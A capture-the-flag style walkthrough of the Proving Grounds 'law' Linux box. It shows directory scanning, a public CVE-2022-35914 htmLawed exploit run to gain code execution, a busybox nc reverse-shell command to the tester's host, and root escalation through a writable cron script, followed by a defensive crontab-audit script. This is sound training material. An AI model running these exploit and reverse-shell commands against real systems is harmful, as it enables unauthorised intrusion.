Proving Grounds - law (Linux)
Proving Grounds law Linux walkthrough covering reconnaissance, initial access, and privilege escalation.
Overview
| Field | Value |
|---|---|
| OS | Linux |
| Difficulty | Not specified |
| Attack Surface | Web application and exposed network services |
| Primary Entry Vector | Web RCE (CVE-2022-35914) |
| Privilege Escalation Path | Local enumeration -> misconfiguration abuse -> root |
Credentials
No credentials obtained.
Reconnaissance
💡 Why this works
This stage maps the reachable attack surface and identifies where exploitation is most likely to succeed. Accurate service and content discovery reduces blind testing and drives targeted follow-up actions.
Initial Foothold
At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.
```bash
feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 50 -r --timeout 3 --no-state -s 200,301,302,401,403 -x php,html,txt --dont-scan '/(css|fonts?|images?|img)/' -u http://$ip
```
```text
❌[0:59][CPU:21][MEM:66][TUN0:192.168.45.166][/home/n0z0]
🐉 > feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 50 -r --timeout 3 --no-state -s 200,301,302,401,403 -x php,html,txt --dont-scan '/(css|fonts?|images?|img)/' -u http://$ip
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.12.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.178.190
🚫 Don't Scan Regex │ /(css|fonts?|images?|img)/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
👌 Status Codes │ [200, 301, 302, 401, 403]
💥 Timeout (secs) │ 3
🦡 User-Agent │ feroxbuster/2.12.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, html, txt]
🏁 HTTP methods │ [GET]
📍 Follow Redirects │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 280c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 455l 1955w 22390c http://192.168.178.190/htmLawed_TESTCASE.txt
200 GET 1817l 17952w 127367c http://192.168.178.190/htmLawed_README.txt
200 GET 478l 4158w 217899c http://192.168.178.190/htmLawed_README.htm
200 GET 388l 2376w 42134c http://192.168.178.190/
200 GET 388l 2376w 42134c http://192.168.178.190/index.php
```
The public PoC at https://github.com/cosad3s/CVE-2022-35914-poc is used to confirm command execution on the target as the web server user:
```bash
python3 CVE-2022-35914.py -u http://192.168.178.190/index.php -c id
```
```text
✅[1:08][CPU:26][MEM:66][TUN0:192.168.45.166][...nd/law/CVE-2022-35914-poc]
🐉 > python3 CVE-2022-35914.py -u http://192.168.178.190/index.php -c id
/home/n0z0/work/04.OSCP/Proving_Ground/law/CVE-2022-35914-poc/CVE-2022-35914.py:19: SyntaxWarning: invalid escape sequence '\ '
/ ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ / ___|/ _ \/ | || |
/home/n0z0/work/04.OSCP/Proving_Ground/law/CVE-2022-35914-poc/CVE-2022-35914.py:64: SyntaxWarning: invalid escape sequence '\$'
return_code_search_regex = "\$spec\: (.*)"
/home/n0z0/work/04.OSCP/Proving_Ground/law/CVE-2022-35914-poc/CVE-2022-35914.py:67: SyntaxWarning: invalid escape sequence '\['
output_search_regex = "\[xml:lang\] \=\> 0\n(.*)\n\)"
/home/n0z0/work/04.OSCP/Proving_Ground/law/CVE-2022-35914-poc/CVE-2022-35914.py:72: SyntaxWarning: invalid escape sequence '\='
cleaning_regex = ".*\=\>"
______ _______ ____ ___ ____ ____ _________ ___ _ _ _
/ ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ / ___|/ _ \/ | || |
| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \___ \ (_) | | || |_
| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) \__, | |__ _|
\____| \_/ |_____| |_____|\___/_____|_____| |____/____/ /_/|_| |_|
[+] Command output (Return code: 0):
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
```bash
python3 CVE-2022-35914.py -u http://192.168.178.190/index.php -c 'busybox nc 192.168.45.166 4444 -e /bin/bash'
```
```text
✅[1:11][CPU:17][MEM:63][TUN0:192.168.45.166][...nd/law/CVE-2022-35914-poc]
🐉 > python3 CVE-2022-35914.py -u http://192.168.178.190/index.php -c 'busybox nc 192.168.45.166 4444 -e /bin/bash'
/home/n0z0/work/04.OSCP/Proving_Ground/law/CVE-2022-35914-poc/CVE-2022-35914.py:19: SyntaxWarning: invalid escape sequence '\ '
/ ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ / ___|/ _ \/ | || |
/home/n0z0/work/04.OSCP/Proving_Ground/law/CVE-2022-35914-poc/CVE-2022-35914.py:64: SyntaxWarning: invalid escape sequence '\$'
return_code_search_regex = "\$spec\: (.*)"
/home/n0z0/work/04.OSCP/Proving_Ground/law/CVE-2022-35914-poc/CVE-2022-35914.py:67: SyntaxWarning: invalid escape sequence '\['
output_search_regex = "\[xml:lang\] \=\> 0\n(.*)\n\)"
/home/n0z0/work/04.OSCP/Proving_Ground/law/CVE-2022-35914-poc/CVE-2022-35914.py:72: SyntaxWarning: invalid escape sequence '\='
cleaning_regex = ".*\=\>"
______ _______ ____ ___ ____ ____ _________ ___ _ _ _
/ ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ / ___|/ _ \/ | || |
| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \___ \ (_) | | || |_
| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) \__, | |__ _|
\____| \_/ |_____| |_____|\___/_____|_____| |____/____/ /_/|_| |_|
```
```bash
nc -lvnp 4444
```
```text
✅[0:59][CPU:29][MEM:66][TUN0:192.168.45.166][/home/n0z0]
🐉 > nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.166] from (UNKNOWN) [192.168.178.190] 53020
```
Retrieved local.txt:
```bash
find / -iname local.txt 2>/dev/null
cat /var/www/local.txt
```
```text
www-data@law:/var/www/html$ find / -iname local.txt 2>/dev/null
/var/www/local.txt
www-data@law:/var/www/html$ cat /var/www/local.txt
fce3f2eacfb1b1d711084e361945b2d7
```
💡 Why this works
The initial access step chains discovered weaknesses into executable control over the target. Successful foothold techniques are validated by command execution or interactive shell callbacks.
Privilege Escalation
Local enumeration of the web root turns up a cleanup script that is owned, and therefore writable, by www-data rather than root:
```text
╔══════════╣ Web files?(output limit)
/var/www/:
total 20K
drwxr-xr-x 3 root root 4.0K Aug 25 2023 .
drwxr-xr-x 12 root root 4.0K Aug 24 2023 ..
-rwxr-xr-x 1 www-data www-data 82 Aug 25 2023 cleanup.sh
drwxr-xr-x 2 www-data www-data 4.0K Aug 25 2023 html
-rw-r--r-- 1 www-data www-data 33 Feb 16 10:59 local.txt
```
Monitoring processes with pspy64 shows a root cron job (UID=0) executing that script:
```text
2026/02/16 11:20:01 CMD: UID=0 PID=15655 | /usr/sbin/CRON -f
2026/02/16 11:20:01 CMD: UID=0 PID=15657 | /usr/sbin/CRON -f
2026/02/16 11:20:01 CMD: UID=0 PID=15658 | /bin/sh -c /var/www/cleanup.sh
```
```bash
cat cleanup.sh
```
```text
www-data@law:/var/www$ cat cleanup.sh
```
💡 Why this works
Privilege escalation relies on local misconfigurations, unsafe permissions, and trusted execution paths. Enumerating and abusing these trust boundaries is the fastest route to root-level access.
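A defender's counterpart to the cron finding above, added here as example code that is not from the box or the writeup's tooling: a POSIX shell audit that flags scripts referenced from crontab files which root would run but a non-root user owns or can write, exercised against a constructed crontab modelled on /var/www/cleanup.sh. It assumes GNU coreutils `stat` on Linux.

```shell
#!/bin/sh
# Added example (not from the box or the writeup): flag scripts that a root
# cron job runs but that a non-root user owns or can write, the
# /var/www/cleanup.sh pattern above. Assumes GNU coreutils `stat` (Linux).
# audit_cron_targets CRONFILE... : print one line per risky script and
# return 1 if any was found, 0 otherwise.
audit_cron_targets() {
  findings=0
  for cronfile in "$@"; do
    [ -r "$cronfile" ] || continue
    # Absolute paths on non-comment lines; -f below drops noise like /dev/null.
    paths=$(grep -v '^[[:space:]]*#' "$cronfile" \
            | grep -oE '/[^[:space:];|&>]+' | sort -u)
    # Read via here-doc so a pattern such as /tmp/*.tmp is not glob-expanded.
    while IFS= read -r path; do
      [ -f "$path" ] || continue
      owner=$(stat -L -c '%U' "$path")   # -L: judge the target, not a symlink
      perm=$(stat -L -c '%a' "$path")
      reason=""
      [ "$owner" = "root" ] || reason="owned by $owner, not root"
      # Group (second-last octal digit) or other (last digit) write bit set?
      case "$perm" in
        *[2367]|*[2367][0-7]) reason="${reason:+$reason; }mode $perm is group/world writable" ;;
      esac
      if [ -n "$reason" ]; then
        echo "RISK: $cronfile runs $path ($reason)"
        findings=$((findings + 1))
      fi
    done <<EOF
$paths
EOF
  done
  [ "$findings" -eq 0 ]
}

# make_fixture: constructed crontab pair modelled on this box, where a root
# job runs a cleanup script that anyone can edit. Prints the directory.
make_fixture() {
  d=$(mktemp -d)
  printf '#!/bin/sh\nrm -f /tmp/*.tmp\n' > "$d/cleanup.sh"
  chmod 777 "$d/cleanup.sh"          # constructed: writable by everyone
  printf '# constructed sample crontab\n' > "$d/crontab.bad"
  printf '* * * * * root /bin/sh -c %s\n' "$d/cleanup.sh" >> "$d/crontab.bad"
  printf '# nothing scheduled here\n' > "$d/crontab.clean"
  echo "$d"
}
# Stand-alone run: the fixture should produce exactly one RISK line.
fixture=$(make_fixture)
audit_cron_targets "$fixture/crontab.bad" "$fixture/crontab.clean" || true
rm -rf "$fixture"
```

Pointing it at /etc/crontab and the files under /etc/cron.d on a real host gives the same check for the root-run scripts a scheduler trusts.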
Lessons Learned / Key Takeaways
- Validate framework debug mode and error exposure in production-like environments.
- Restrict file permissions on scripts and binaries executed by privileged users or schedulers.
- Harden sudo policies to avoid wildcard command expansion and scriptable privileged tools.
- Treat exposed credentials and environment files as critical secrets.
Attack Flow
```mermaid
graph LR
subgraph SCAN["🔍 1. Scanning"]
direction TB
A1[Rustscan] --> A2["Ports found<br/>22: SSH OpenSSH 8.4p1<br/>80: HTTP Apache 2.4.56"]
A2 --> A3[Nmap service detection]
A3 --> A4["htmLawed identified<br/>v1.2.5<br/>test page confirmed"]
A4 --> A5[Feroxbuster]
A5 --> A6["Vulnerability research<br/>CVE-2022-35914<br/>htmLawed RCE"]
end
subgraph INITIAL["🚪 2. Initial Access"]
direction TB
B1[CVE-2022-35914 PoC] --> B2["RCE test<br/>id command executed successfully"]
B2 --> B3["Reverse shell payload<br/>using busybox nc"]
B3 --> B4["Exploit run<br/>192.168.45.166:4444"]
B4 --> B5["www-data shell obtained"]
B5 --> B6["local.txt<br/>fce3f2eacfb..."]
end
subgraph PRIVESC["⬆️ 3. Privilege Escalation"]
direction TB
C1["File enumeration<br/>/var/www/cleanup.sh found"] --> C2["pspy64 run<br/>process monitoring"]
C2 --> C3["cron job found<br/>UID=0 root<br/>/bin/sh -c cleanup.sh"]
C3 --> C4["cleanup.sh permissions checked<br/>-rwxr-xr-x www-data"]
C4 --> C5["cleanup.sh overwritten<br/>busybox nc reverse shell"]
C5 --> C6["root shell obtained<br/>192.168.45.166:4445"]
C6 --> C7["proof.txt<br/>9bb03c0f2c..."]
end
SCAN --> INITIAL
INITIAL --> PRIVESC
style A6 fill:#ff6b6b
style B5 fill:#51cf66
style B6 fill:#ffd43b
style C6 fill:#ff6b6b
style C7 fill:#ffd43b
```
References
- CVE-2022-35914: https://nvd.nist.gov/vuln/detail/CVE-2022-35914
- RustScan: https://github.com/RustScan/RustScan
- Nmap: https://nmap.org/
- feroxbuster: https://github.com/epi052/feroxbuster
- Nuclei: https://github.com/projectdiscovery/nuclei
- GTFOBins: https://gtfobins.org/
- HackTricks Privilege Escalation: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html